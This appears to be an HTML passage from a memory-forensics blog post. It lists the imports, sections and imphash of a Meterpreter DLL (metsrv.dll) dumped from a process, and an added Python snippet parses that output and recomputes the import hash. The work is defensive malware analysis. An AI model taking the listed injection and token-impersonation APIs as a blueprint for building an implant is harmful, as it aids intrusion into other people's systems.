class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.VirtualAllocEx</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.OpenProcess</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.DuplicateHandle</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.OpenThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SuspendThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: 
#f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetVersionExA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CreateToolhelp32Snapshot</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.Thread32First</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.Thread32Next</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.CreateRemoteThread</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; 
font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetThreadId</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.HeapFree</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.HeapAlloc</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.HeapReAlloc</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetSystemTimeAsFileTime</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; 
font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.RtlUnwindEx</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetCommandLineA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.EnterCriticalSection</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.LeaveCriticalSection</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetTimeZoneInformation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; 
line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.IsProcessorFeaturePresent</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.IsDebuggerPresent</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetModuleFileNameW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetModuleHandleExW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.WriteConsoleW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 
0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.EncodePointer</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.DecodePointer</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetConsoleCtrlHandler</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetConsoleMode</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.ReadConsoleInputA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" 
style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetConsoleMode</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetProcessHeap</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.AreFileApisANSI</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- USER32.dll.GetThreadDesktop</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- USER32.dll.GetUserObjectInformationW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: 
no-common-ligatures;"><span class="Apple-converted-space"> </span>- USER32.dll.MessageBoxW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- USER32.dll.GetDesktopWindow</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- USER32.dll.GetProcessWindowStation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.ReportEventW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.AdjustTokenPrivileges</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span 
class="Apple-converted-space"> </span>- ADVAPI32.dll.ImpersonateLoggedOnUser</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.LookupPrivilegeValueA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.RegisterEventSourceW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.DeregisterEventSource</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.OpenThreadToken</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" 
style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.OpenProcessToken</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">sections:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- .text</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>virtual address: 0x1000 <span class="Apple-converted-space"> </span>size: 0xb3ac4</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>raw address: <span class="Apple-converted-space"> </span>0x400<span class="Apple-converted-space"> </span>size: 0xb3c00</span></p><p class="p1" 
style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- .rdata</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>virtual address: 0xb5000<span class="Apple-converted-space"> </span>size: 0x4019e</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>raw address: <span class="Apple-converted-space"> </span>0xb4000<span class="Apple-converted-space"> </span>size: 0x40200</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- .data</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>virtual 
address: 0xf6000<span class="Apple-converted-space"> </span>size: 0x25ad0</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>raw address: <span class="Apple-converted-space"> </span>0xf4200<span class="Apple-converted-space"> </span>size: 0x1e600</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- .pdata</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>virtual address: 0x11c000 <span class="Apple-converted-space"> </span>size: 0xa02c</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>raw address: <span class="Apple-converted-space"> </span>0x112800 <span class="Apple-converted-space"> </span>size: 0xa200</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; 
font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- .reloc</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>virtual address: 0x127000 <span class="Apple-converted-space"> </span>size: 0x571c</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>raw address: <span class="Apple-converted-space"> </span>0x11ca00 <span class="Apple-converted-space"> </span>size: 0x5800</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">imphash: 5df789b340bdc9056bbdeb6485e684b1</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; 
orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Beautiful! We've got the name of the dll, </font><a href="https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/" target="_blank"><font face="courier">metsrv.dll</font></a><font face="inherit">, its exports and imports. 
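The import list above is what the next step works from. As an added example (not the author's memdumppe.py, and not Metasploit code), the Python below parses that " - MODULE.dll.Function" output format, pulls out the unique DLL names, checks them against a list of DLLs late-loaded into the host process, and recomputes an import hash the way pefile does. The sample output and the late-loaded list are constructed for the example, and the imphash routine assumes every import is by name.

```python
import hashlib
import re
from typing import Dict, List, Tuple

# Constructed sample in the format of the memdumppe.py output shown above
# (a handful of entries, not the full import table of the dump).
SAMPLE_OUTPUT = """\
imports:
 - KERNEL32.dll.WriteFile
 - KERNEL32.dll.CreateRemoteThread
 - ADVAPI32.dll.AdjustTokenPrivileges
 - WINHTTP.dll.WinHttpOpen
 - WININET.dll.InternetOpenA
 - WS2_32.dll.WSAStartup
sections:
 - .text
   virtual address: 0x1000  size: 0xb3ac4
"""

# Constructed stand-in for the list of DLLs late-loaded into spoolsv.exe
# that the post compares against; only the two the post names are included.
LATE_LOADED_DLLS = ["WINHTTP.dll", "WININET.dll"]

# One " - MODULE.ext.Function" line; assumes the module base name has no dots.
IMPORT_LINE = re.compile(
    r"^\s*-\s+(?P<dll>[^.\s]+\.(?:dll|ocx|sys))\.(?P<func>\S+)\s*$", re.IGNORECASE
)


def parse_imports(text: str) -> List[Tuple[str, str]]:
    """Return (dll, function) pairs from the 'imports:' block, in listed order."""
    pairs: List[Tuple[str, str]] = []
    in_imports = False
    for line in text.splitlines():
        stripped = line.strip()
        # Top-level keys such as 'imports:' / 'sections:' switch blocks.
        if stripped.endswith(":") and not stripped.startswith("-"):
            in_imports = stripped.lower() == "imports:"
            continue
        if in_imports:
            match = IMPORT_LINE.match(line)
            if match:
                pairs.append((match.group("dll"), match.group("func")))
    return pairs


def imported_dlls(pairs: List[Tuple[str, str]]) -> List[str]:
    """Unique DLL names (case-insensitive), sorted like the list in the post."""
    unique: Dict[str, str] = {}
    for dll, _ in pairs:
        unique.setdefault(dll.upper(), dll)
    return sorted(unique.values(), key=str.upper)


def late_loaded_overlap(dlls: List[str], late_loaded: List[str]) -> List[str]:
    """DLLs that also appear in the late-loaded list (case-insensitive)."""
    late = {name.upper() for name in late_loaded}
    return [dll for dll in dlls if dll.upper() in late]


def imphash(pairs: List[Tuple[str, str]]) -> str:
    """Import hash computed the way pefile does it: lowercase 'module.function'
    strings (extension .dll/.ocx/.sys dropped) joined by commas, then MD5.
    Assumes every import is by name; pefile resolves ordinals to names first."""
    if not pairs:
        return ""  # mirror pefile, which yields no hash for a PE without imports
    parts = []
    for dll, func in pairs:
        module = dll.lower()
        base, _, ext = module.rpartition(".")
        if ext in ("dll", "ocx", "sys"):
            module = base
        parts.append(f"{module}.{func.lower()}")
    return hashlib.md5(",".join(parts).encode()).hexdigest()


def analyse(text: str, late_loaded: List[str]) -> Dict[str, object]:
    """Tie the steps together for one memdumppe.py-style output."""
    pairs = parse_imports(text)
    dlls = imported_dlls(pairs)
    return {
        "dlls": dlls,
        "late_loaded_overlap": late_loaded_overlap(dlls, late_loaded),
        "imphash": imphash(pairs),
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_OUTPUT, LATE_LOADED_DLLS).items():
        print(f"{key}: {value}")
```

Matching the recomputed imphash against the one memdumppe.py reports is a quick way to confirm the import table was parsed completely and in order.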
If we extract the dlls from the imports, we get:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">ADVAPI32.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CRYPT32.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span style="font-variant-ligatures: no-common-ligatures;">KERNEL32.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: 
normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">USER32.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">WINHTTP.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">WININET.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">WS2_32.dll</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; 